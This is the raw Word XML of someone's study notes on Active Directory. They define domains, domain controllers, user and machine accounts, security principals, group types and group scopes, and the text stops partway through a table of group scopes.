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BC259" w14:textId="06E34A05" w:rsidR="00F61A2B" w:rsidRDefault="00F61A2B" w:rsidP="00F61A2B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D3A0E5" w14:textId="4DB2080D" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A">
      <w:r w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows domain:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> group of users and computers under the administration of a given business.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD06601" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A">
      <w:r w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain Controller (DC):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The server that runs the Active Directory services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4E1EDA" w14:textId="26F81891" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active Directory (AD):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> single repository on the DC that </w:t>
      </w:r>
      <w:r w:rsidR="00D55A98">
        <w:t>makes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the domain and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>centralize</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the administration of common components of a Windows computer network in a single repository. </w:t>
      </w:r>
      <w:r w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00D55A98" w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> on domain controller that </w:t>
      </w:r>
      <w:r w:rsidR="00D55A98" w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enables</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> centralized authentication &amp; authorization for the domain.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A83C56A" w14:textId="096B2579" w:rsidR="00DC359E" w:rsidRDefault="00DC359E" w:rsidP="00DC359E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC359E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active Directory</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC359E">
        <w:t xml:space="preserve"> is a directory service developed by Microsoft for Windows domain networks. It stores information about network objects such as computers, users, and groups. It provides authentication and authorisation </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC359E">
        <w:t>services, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC359E">
        <w:t xml:space="preserve"> allows administrators to manage network resources centrally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C426AA" w14:textId="7CB6918E" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="00DC359E">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(benefits)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; Centralized identity management: All users across the network can be configured from Active Directory with minimum effort, managing security policies: configure security policies directly from Active Directory and apply them to users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602BCE3A" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B9FAEA1" w14:textId="1FFDA190" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A">
      <w:r w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active Directory Domain Service (AD DS):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> service acts as a catalogue that holds the information of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the "objects" that exist on your network (objects -&gt; users, machines, groups, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>printers,...</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F112679" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A"/>
    <w:p w14:paraId="66D388AB" w14:textId="76CC4F11" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A">
      <w:r w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:r w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>one of the objects</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> known as </w:t>
      </w:r>
      <w:r w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>security principles</w:t>
      </w:r>
      <w:r>
        <w:t>, meaning that they can be authenticated by the domain and can be assigned privileges over resources like files or printers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE38A9B" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A">
      <w:r>
        <w:t>Users (2 types):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164928F7" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A">
      <w:r>
        <w:t>People, Services-&gt; users used by services like IIS or MSSQL, service users are different from regular users as they will only have the privileges needed to run their specific service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207216C6" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CC3D6A8" w14:textId="38685A60" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A">
      <w:r w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Machines</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are another type of </w:t>
      </w:r>
      <w:r w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> within Active Directory (considered "security principles"), like users when </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>machine</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> join to AD domain it assigns as account, Machine </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Account passwords are automatically rotated out and are generally comprised of 120 random characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200EBCC8" w14:textId="508CACF9" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>machine</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> account name is the computer's name followed by a dollar sign. ex: a machine named DC01 will have a machine account called DC01$. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535A5108" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A"/>
    <w:p w14:paraId="45B290CB" w14:textId="7DC205CC" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A">
      <w:r w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00410D1B" w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>principal</w:t>
      </w:r>
      <w:r w:rsidR="00410D1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is an object that can act upon resources in the network (</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5D9A">
        <w:t>security principals: user accounts and computer accounts</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5D9A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D35D18" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRPr="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Administrators are two types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A73E1A" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRPr="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service administrators</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5D9A">
        <w:t>: Responsible for maintaining and delivering Active Directory Domain Services (AD DS), including managing domain controllers and configuring AD DS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38066A3A" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRPr="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data administrators</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5D9A">
        <w:t>: Responsible for maintaining the data that's stored in AD DS and on domain member servers and workstations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D94FB3" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A"/>
    <w:p w14:paraId="2CED2624" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A"/>
    <w:p w14:paraId="20DCEE6C" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRPr="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A5D9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Security Groups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B379AD" w14:textId="77777777" w:rsidR="008A5D9A" w:rsidRDefault="008A5D9A" w:rsidP="008A5D9A">
      <w:r>
        <w:t>Security groups are a way to collect user accounts, computer accounts, and other groups into manageable units.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2918AA4F" w14:textId="77777777" w:rsidR="00410D1B" w:rsidRPr="00410D1B" w:rsidRDefault="00410D1B" w:rsidP="00410D1B">
      <w:r w:rsidRPr="00410D1B">
        <w:t xml:space="preserve">Active Directory has two </w:t>
      </w:r>
      <w:r w:rsidRPr="00410D1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>types of groups</w:t>
      </w:r>
      <w:r w:rsidRPr="00410D1B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324A5CE3" w14:textId="77777777" w:rsidR="00410D1B" w:rsidRPr="00410D1B" w:rsidRDefault="00410D1B" w:rsidP="00410D1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00410D1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security groups</w:t>
      </w:r>
      <w:r w:rsidRPr="00410D1B">
        <w:t>: Use to assign permissions to shared resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5032BE44" w14:textId="3427A7A0" w:rsidR="00410D1B" w:rsidRDefault="00410D1B" w:rsidP="00410D1B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00410D1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Distribution groups</w:t>
      </w:r>
      <w:r w:rsidRPr="00410D1B">
        <w:t>: Use to create email distribution lists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BDBE8F" w14:textId="77777777" w:rsidR="00786006" w:rsidRDefault="008A5D9A" w:rsidP="00786006">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Groups can have both users and machines as members. If needed, groups can include other groups as well.</w:t>
      </w:r>
      <w:r w:rsidR="00410D1B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00410D1B" w:rsidRPr="00410D1B">
        <w:t>You can use distribution groups only to send email to collections of users by using an email application like Exchange Server. Distribution groups aren't security enabled, so you can't include them in DACLs</w:t>
      </w:r>
      <w:r w:rsidR="00410D1B">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00410D1B" w:rsidRPr="00410D1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Discretionary Access Control List (DACL)</w:t>
      </w:r>
      <w:r w:rsidR="00410D1B" w:rsidRPr="00410D1B">
        <w:t xml:space="preserve"> is a component of security that defines the permissions associated with an object</w:t>
      </w:r>
      <w:r w:rsidR="00410D1B">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00410D1B" w:rsidRPr="00410D1B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBF100A" w14:textId="7301A455" w:rsidR="00786006" w:rsidRDefault="00786006" w:rsidP="00786006">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786006">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Group </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00786006">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00786006">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>identifies the extent to which the group is applied in the domain tree or forest. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B6E66E" w14:textId="0F0652F3" w:rsidR="00786006" w:rsidRPr="00786006" w:rsidRDefault="00786006" w:rsidP="00786006">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786006">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Universal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: (Grant permissions </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00786006">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>On</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00786006">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> any domain in the same forest or trusting forests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00786006">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Accounts, Global groups, Other Universal groups from any domain in the same forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B2F1CF" w14:textId="1D69BAA8" w:rsidR="00786006" w:rsidRPr="00786006" w:rsidRDefault="00786006" w:rsidP="00786006">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786006">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Global: (grant Permissions On any domain in the same forest, or trusting domains or forests)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00786006">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Accounts from the same domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311BEAC1" w14:textId="4AB3A803" w:rsidR="00786006" w:rsidRPr="00786006" w:rsidRDefault="00786006" w:rsidP="00786006">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786006">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Domain Local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: (</w:t>
      </w:r>
      <w:r w:rsidRPr="00786006">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>grant permissions Within the same domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="161616"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10674"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10638"/>
      </w:tblGrid>
      <w:tr w:rsidR="00786006" w:rsidRPr="00786006" w14:paraId="21CB9133" w14:textId="77777777" w:rsidTr="00786006">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1709CBDA" w14:textId="6116180D" w:rsidR="00786006" w:rsidRPr="00786006" w:rsidRDefault="00786006" w:rsidP="00786006">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="161616"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DDE2696" w14:textId="77777777" w:rsidR="00786006" w:rsidRPr="00786006" w:rsidRDefault="00786006" w:rsidP="00786006">
            <w:pPr>
              <w:ind w:left="1080"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="161616"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00786006">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="161616"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Accounts from any domain or any trusted domain</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E7B31C3" w14:textId="77777777" w:rsidR="00786006" w:rsidRPr="00786006" w:rsidRDefault="00786006" w:rsidP="00786006">
            <w:pPr>
              <w:ind w:left="1080"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="161616"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00786006">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="161616"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Global groups from any domain or any trusted domain</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57310DFC" w14:textId="77777777" w:rsidR="00786006" w:rsidRPr="00786006" w:rsidRDefault="00786006" w:rsidP="00786006">
            <w:pPr>
              <w:ind w:left="1080"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="161616"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00786006">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="161616"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Universal groups from any domain in the same forest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FF2580A" w14:textId="77777777" w:rsidR="00786006" w:rsidRPr="00786006" w:rsidRDefault="00786006" w:rsidP="00786006">
            <w:pPr>
